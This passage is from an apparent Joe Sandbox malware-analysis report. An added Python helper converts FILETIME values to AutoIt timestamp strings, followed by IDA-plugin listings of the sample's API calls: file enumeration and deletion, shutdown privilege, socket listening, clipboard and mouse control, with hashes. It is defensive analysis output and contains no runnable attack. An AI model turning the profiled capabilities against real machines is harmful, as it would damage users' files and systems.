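The function above is the runtime's file-timestamp conversion: FindFirstFileW fills a WIN32_FIND_DATAW, the FILETIME goes through FileTimeToLocalFileTime and FileTimeToSystemTime, and the result is printed with the "%4d%02d%02d%02d%02d%02d" and "%4d%02d%02d%02d%02d%02d%03d" formats listed under String ID. An analyst pulling raw FILETIME values out of the memory dumps listed above has to redo that conversion by hand. The Python below is an added example that reproduces the chain offline; it is not code from the sample, from the AutoIt runtime or from Joe Sandbox. The sample timestamp and the time-zone bias are constructed inputs, not values taken from this report.

```python
"""FILETIME -> AutoIt-style timestamp string, mirroring the call chain
FileTimeToLocalFileTime -> FileTimeToSystemTime -> "%4d%02d%02d%02d%02d%02d".

Added example for analysts converting raw FILETIME values pulled from a
memory dump; it is not code from the sample or from Joe Sandbox.
"""
from datetime import datetime, timedelta, timezone

# A FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# FILETIME of 1970-01-01 00:00:00 UTC; handy for cross-checking against Unix time.
UNIX_EPOCH_AS_FILETIME = 116_444_736_000_000_000


def filetime_from_dwords(low: int, high: int) -> int:
    """Rebuild the 64-bit FILETIME from the dwLowDateTime/dwHighDateTime pair
    as laid out in WIN32_FIND_DATAW (the structure FindFirstFileW fills)."""
    if not (0 <= low < 2**32 and 0 <= high < 2**32):
        raise ValueError("each DWORD must be an unsigned 32-bit value")
    return (high << 32) | low


def filetime_to_datetime(filetime: int) -> datetime:
    """Equivalent of FileTimeToSystemTime applied to the raw value (UTC result).
    The last digit of the 100-ns count is dropped, since datetime stops at
    microseconds; values past year 9999 raise OverflowError from datetime."""
    if not 0 <= filetime < 2**64:
        raise ValueError("FILETIME must be an unsigned 64-bit value")
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def to_local(dt_utc: datetime, bias_minutes: int) -> datetime:
    """Equivalent of FileTimeToLocalFileTime with an explicit bias.

    The Win32 call applies the machine's *current* time-zone and DST settings
    to every timestamp, so a file written under a different DST state comes
    out skewed by an hour. Bias follows the TIME_ZONE_INFORMATION sign
    convention (UTC = local + Bias): 0 for UTC, -60 for UTC+1. The bias is an
    assumption supplied by the caller, not data from the report."""
    return dt_utc.astimezone(timezone(timedelta(minutes=-bias_minutes)))


def format_autoit(dt: datetime, with_millis: bool = False) -> str:
    """Apply the format strings seen in the trace:
    "%4d%02d%02d%02d%02d%02d" and, with milliseconds, the "%03d" variant."""
    s = (f"{dt.year:4d}{dt.month:02d}{dt.day:02d}"
         f"{dt.hour:02d}{dt.minute:02d}{dt.second:02d}")
    if with_millis:
        s += f"{dt.microsecond // 1000:03d}"
    return s


def filetime_to_autoit(low: int, high: int, bias_minutes: int = 0,
                       with_millis: bool = False) -> str:
    """The whole chain: WIN32_FIND_DATAW DWORD pair -> local time -> string."""
    ft = filetime_from_dwords(low, high)
    return format_autoit(to_local(filetime_to_datetime(ft), bias_minutes), with_millis)


if __name__ == "__main__":
    # Constructed sample: the DWORD pair for 2024-12-20 08:22:41 UTC
    # (Unix time 1734682961), not a value recovered from the dump.
    sample = UNIX_EPOCH_AS_FILETIME + 1_734_682_961 * 10_000_000
    low, high = sample & 0xFFFFFFFF, sample >> 32
    print(filetime_to_autoit(low, high))                    # UTC
    print(filetime_to_autoit(low, high, bias_minutes=-60))  # UTC+1
```

When timelining from a dump, pass the bias explicitly rather than letting the host apply its current settings: Microsoft documents that FileTimeToLocalFileTime uses the current time-zone and daylight-saving state for every input, which is exactly the skew that makes sandbox-local timestamps disagree with the UTC values in the raw structures.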
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C89663
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C896A1
                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00C896BB
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C896D3
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C896DE
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C896FA
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C8974A
                                                                                      • SetCurrentDirectoryW.KERNEL32(00CD6B7C), ref: 00C89768
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C89772
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C8977F
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C8978F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1409584000-438819550
                                                                                      • Opcode ID: 2efca4a01feb5f7e0a26a879f5e22daff292350ba86c56e87fa5db827f0d1363
                                                                                      • Instruction ID: 5864703d5ce4aeb124cca40ab01f5983de2ac4ca1127a3afc97061857f7e6aff
                                                                                      • Opcode Fuzzy Hash: 2efca4a01feb5f7e0a26a879f5e22daff292350ba86c56e87fa5db827f0d1363
                                                                                      • Instruction Fuzzy Hash: 4531B0325012197ADB14BFB4DC49BEE77ACDF4A328F184166F915E31A0EB34DE408B58
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C897BE
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C89819
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C89824
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C89840
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C89890
                                                                                      • SetCurrentDirectoryW.KERNEL32(00CD6B7C), ref: 00C898AE
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C898B8
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C898C5
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C898D5
                                                                                        • Part of subcall function 00C7DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C7DB00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                      • String ID: *.*
                                                                                      • API String ID: 2640511053-438819550
                                                                                      • Opcode ID: 9e22c776942402643d04734d45fce189ca331edd2803b126a9885d47d9fdf7f5
                                                                                      • Instruction ID: 9f4eaa2f47800a5430fee4fd252755d82378d8c59968c8c5712c003688f9528c
                                                                                      • Opcode Fuzzy Hash: 9e22c776942402643d04734d45fce189ca331edd2803b126a9885d47d9fdf7f5
                                                                                      • Instruction Fuzzy Hash: 5731923150161A7ADF14BFA4DC48BEE77ACDF06328F184166E924A31E0DB31DE44DB68
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(?), ref: 00C88257
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C88267
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C88273
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C88310
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88324
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88356
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C8838C
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1464919966-438819550
                                                                                      • Opcode ID: 57004ca5c9f19fbe13cf5d8a875840798b9e97350820e2e10f749e9b1c919864
                                                                                      • Instruction ID: 00dd1889fdd3c7ef77a8edcd24473cfd6a4942c0c2674699fc445a1bec6809a8
                                                                                      • Opcode Fuzzy Hash: 57004ca5c9f19fbe13cf5d8a875840798b9e97350820e2e10f749e9b1c919864
                                                                                      • Instruction Fuzzy Hash: 3C61AF725043059FCB10EF64C884AAEB3E8FF89314F44891EF999C7251EB31E949DB96
                                                                                      APIs
                                                                                        • Part of subcall function 00C13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C13A97,?,?,00C12E7F,?,?,?,00000000), ref: 00C13AC2
                                                                                        • Part of subcall function 00C7E199: GetFileAttributesW.KERNEL32(?,00C7CF95), ref: 00C7E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C7D122
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C7D1DD
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C7D1F0
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7D20D
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7D237
                                                                                        • Part of subcall function 00C7D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C7D21C,?,?), ref: 00C7D2B2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00C7D253
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C7D264
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 1946585618-1173974218
                                                                                      • Opcode ID: 0d0ffeb50afa800ec5c66d5fd21248b2ec6194cb64b117cab35e33f48777e87c
                                                                                      • Instruction ID: 346603091191f4baccfbad29ac0497b520a665c36da269716e70684a4875cb74
                                                                                      • Opcode Fuzzy Hash: 0d0ffeb50afa800ec5c66d5fd21248b2ec6194cb64b117cab35e33f48777e87c
                                                                                      • Instruction Fuzzy Hash: C7619F31C0114D9FCF05EBE0C992AEDB7B5AF56304F648165E41A771A2EB306F4AEB60
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1737998785-0
                                                                                      • Opcode ID: f5f17989e915222f1495c918e21ceef1ac91ef38faa81022fbd1d9311da75b0d
                                                                                      • Instruction ID: ae2a4e78ac24e53f7135333d19a614ac30d6e6a7c44fcfc904dd62565cc66dd7
                                                                                      • Opcode Fuzzy Hash: f5f17989e915222f1495c918e21ceef1ac91ef38faa81022fbd1d9311da75b0d
                                                                                      • Instruction Fuzzy Hash: 59418B35204611AFE720EF15D888B59BBE5EF4532CF14C099F4298B7A2C735ED42CB94
                                                                                      APIs
                                                                                        • Part of subcall function 00C716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7170D
                                                                                        • Part of subcall function 00C716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7173A
                                                                                        • Part of subcall function 00C716C3: GetLastError.KERNEL32 ref: 00C7174A
                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00C7E932
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                      • API String ID: 2234035333-3163812486
                                                                                      • Opcode ID: 2cbe07943716d6222a9297ce9e09c8ff6081105087fe7c9f8e64ce2c456a3288
                                                                                      • Instruction ID: 5ba57ae9c2c6692cac9b92d5975b65f7302b6dba7432f4e8264bb98a3cd179b1
                                                                                      • Opcode Fuzzy Hash: 2cbe07943716d6222a9297ce9e09c8ff6081105087fe7c9f8e64ce2c456a3288
                                                                                      • Instruction Fuzzy Hash: 3A014933610211AFEB6426B99CCAFFF725C9708754F18C462FE1BE31D1D6A05D409290
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C91276
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91283
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00C912BA
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C912C5
                                                                                      • closesocket.WSOCK32(00000000), ref: 00C912F4
                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00C91303
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C9130D
                                                                                      • closesocket.WSOCK32(00000000), ref: 00C9133C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                      • String ID:
                                                                                      • API String ID: 540024437-0
                                                                                      • Opcode ID: 4277d29b679ae937f560bda7b154a6af7dd75b9707a6b951ebe5d2a7c6d4eb67
                                                                                      • Instruction ID: 50d5365d644ff7cd108697e16cc3d1b0be8b01e63d005c3da042485e372f8447
                                                                                      • Opcode Fuzzy Hash: 4277d29b679ae937f560bda7b154a6af7dd75b9707a6b951ebe5d2a7c6d4eb67
                                                                                      • Instruction Fuzzy Hash: CD4173316001419FDB10EF64C4C9B69BBE5BF46318F188198E8669F2D2C775ED81CBE1
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00C4B9D4
                                                                                      • _free.LIBCMT ref: 00C4B9F8
                                                                                      • _free.LIBCMT ref: 00C4BB7F
                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CB3700), ref: 00C4BB91
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C4BC09
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE1270,000000FF,?,0000003F,00000000,?), ref: 00C4BC36
                                                                                      • _free.LIBCMT ref: 00C4BD4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 314583886-0
                                                                                      • Opcode ID: 93f63ace2c4a43a70f07d520a5e9d341bbd5a02c9721c6c4007e8c37b70e50ea
                                                                                      • Instruction ID: 8e6adf1439aec34dce70b9ecef397bc017950c00f6fd34bf1717aeb3e7bea8c9
                                                                                      • Opcode Fuzzy Hash: 93f63ace2c4a43a70f07d520a5e9d341bbd5a02c9721c6c4007e8c37b70e50ea
                                                                                      • Instruction Fuzzy Hash: 35C11671A04245AFDB209F69CC81BAEBBB9FF51320F18419AE9A4DB251EB30DE41D750
                                                                                      APIs
                                                                                        • Part of subcall function 00C13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C13A97,?,?,00C12E7F,?,?,?,00000000), ref: 00C13AC2
                                                                                        • Part of subcall function 00C7E199: GetFileAttributesW.KERNEL32(?,00C7CF95), ref: 00C7E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C7D420
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7D470
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7D481
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C7D498
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C7D4A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 2649000838-1173974218
                                                                                      • Opcode ID: 69417e6b4654bb148b4ec3b6afce32375e88d7cef51da8c7434f0d24f4821a4f
                                                                                      • Instruction ID: 6842e7528b7086087198afd85b1549ff7594323606f316ccdfc8776edc8dd0ef
                                                                                      • Opcode Fuzzy Hash: 69417e6b4654bb148b4ec3b6afce32375e88d7cef51da8c7434f0d24f4821a4f
                                                                                      • Instruction Fuzzy Hash: 223182710093419FC300EF64C8959EFB7E8BE92314F448A1DF4E6531A1EB30AA49EB63
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 4168288129-2761157908
                                                                                      • Opcode ID: 410ef73c84bd9a56208c392662da350cc741968523cac10b96c0a74efe3d7c87
                                                                                      • Instruction ID: a83fd9730878d486a1dc7fca97311a091d81e5397e0b51e8a639bc602c3393c2
                                                                                      • Opcode Fuzzy Hash: 410ef73c84bd9a56208c392662da350cc741968523cac10b96c0a74efe3d7c87
                                                                                      • Instruction Fuzzy Hash: A4C23A72E046288FDB25CE28DD407EAB7B5FB49315F1541EAD85DE7280E774AE828F40
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00C864DC
                                                                                      • CoInitialize.OLE32(00000000), ref: 00C86639
                                                                                      • CoCreateInstance.OLE32(00CAFCF8,00000000,00000001,00CAFB68,?), ref: 00C86650
                                                                                      • CoUninitialize.OLE32 ref: 00C868D4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 886957087-24824748
                                                                                      • Opcode ID: ff0300871d948f27ac21ee0f066b756d5edb3f515985fb1a78c40e44afe3c939
                                                                                      • Instruction ID: a1ee4467611bf2f71af9663140abd31a7e1f63a0ece63222326b3847c22105be
                                                                                      • Opcode Fuzzy Hash: ff0300871d948f27ac21ee0f066b756d5edb3f515985fb1a78c40e44afe3c939
                                                                                      • Instruction Fuzzy Hash: 2AD14B71508301AFD304EF64C891AABB7E8FF99708F00496DF5958B291DB70EE46DB92
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00C922E8
                                                                                        • Part of subcall function 00C8E4EC: GetWindowRect.USER32(?,?), ref: 00C8E504
                                                                                      • GetDesktopWindow.USER32 ref: 00C92312
                                                                                      • GetWindowRect.USER32(00000000), ref: 00C92319
                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C92355
                                                                                      • GetCursorPos.USER32(?), ref: 00C92381
                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C923DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2387181109-0
                                                                                      • Opcode ID: b81d616df88a976d8a95ff010932c24f8e72aff0a500cbbf2e2460f38ed5c356
                                                                                      • Instruction ID: 9d5d4be7bc95b757c138a3acdefb6ab89f140163e27e25b19d7aa6fb04eebd38
                                                                                      • Opcode Fuzzy Hash: b81d616df88a976d8a95ff010932c24f8e72aff0a500cbbf2e2460f38ed5c356
                                                                                      • Instruction Fuzzy Hash: 2031FE72504315AFCB20DF14C849F9BBBADFF88714F000919F99897191DB34EA08CB92
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C89B78
                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C89C8B
                                                                                        • Part of subcall function 00C83874: GetInputState.USER32 ref: 00C838CB
                                                                                        • Part of subcall function 00C83874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C83966
                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C89BA8
                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C89C75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
